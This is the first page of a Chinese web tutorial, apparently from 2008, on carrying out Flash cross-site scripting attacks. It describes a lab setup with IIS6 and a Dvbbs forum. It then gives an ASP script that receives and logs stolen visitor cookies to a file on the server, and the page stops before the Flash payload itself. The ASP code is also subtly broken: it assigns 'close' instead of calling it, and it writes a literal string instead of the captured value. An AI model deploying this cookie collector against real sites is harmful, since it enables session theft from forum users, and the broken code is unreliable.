开发学院网络安全安全技术 解析Flash跨站脚本攻击 阅读

解析Flash跨站脚本攻击

 2008-01-09 13:12:26 来源:WEB开发网   
核心提示:Flash跨站攻击是当下比较流行的跨站攻击手段,且没有很好的预防办法,解析Flash跨站脚本攻击,在它的淫威下有多少网站倒下了,站长们对此叫苦不迭,然后通过脚本获取用户的敏感信息或者打开具有网页木马的URL页面从而实现攻击,一、准备(一)准备脚本1、ASP脚本第一步:构造攻击脚本打开记事本输入如下代码输入并保存为coo

Flash跨站攻击是当下比较流行的跨站攻击手段,且没有很好的预防办法。在它的淫威下有多少网站倒下了,站长们对此叫苦不迭。下面我们就看看Flash跨站脚本攻击到底是如何实现的,知己知彼,然后找到应对措施。

虚拟机部署如下测试环境:

操作系统:windows 2003

web服务器:IIS6.0

论坛:动网Version 7.1.0 Sp1

工具

Falsh 8.0

记事本

前置知识:

首先,先说明一下什么是跨站脚本攻击(CSS/XSS)吧!我们所说跨站脚本是指在远程WEB页面的html代码中插人的其有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,有时候跨站脚本被称为“XSS”,这是因为“CSS”一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或XSS安全漏洞,通常指的都是跨站脚本。Flash跨站攻击是在Flash文件中插入脚本,在播放flash文件的时候脚本被触发,然后通过脚本获取用户的敏感信息或者打开具有网页木马的URL页面从而实现攻击。

一、准备

(一)准备脚本

1、ASP脚本

第一步:构造攻击脚本

打开记事本输入如下代码输入并保存为cookies_flash.asp:

<%
testfile=server.mappath("cookies.txt")
msg=request("msg")
set fs=server.createobject("scripting.filesystemobject")
set thisfile=fs.opentextfile(testfile,8,true,0)
thisfile.writeline("&msg$")
thisfile=close
set fs=nothing
%>

第二步:把cookies_flash.asp上传到支持asp的空间,我们就把它复制到测试环境的论坛根目录下,URL地址为:

1 2 3 4  下一页

Tags:解析 Flash 脚本

编辑录入:爽爽 [复制链接] [打 印]
[]
  • 好
  • 好的评价 如果觉得好,就请您
      0%(0)
  • 差
  • 差的评价 如果觉得差,就请您
      0%(0)
更多精彩
    赞助商链接

    热点阅读
      焦点图片
        最新推荐
          精彩阅读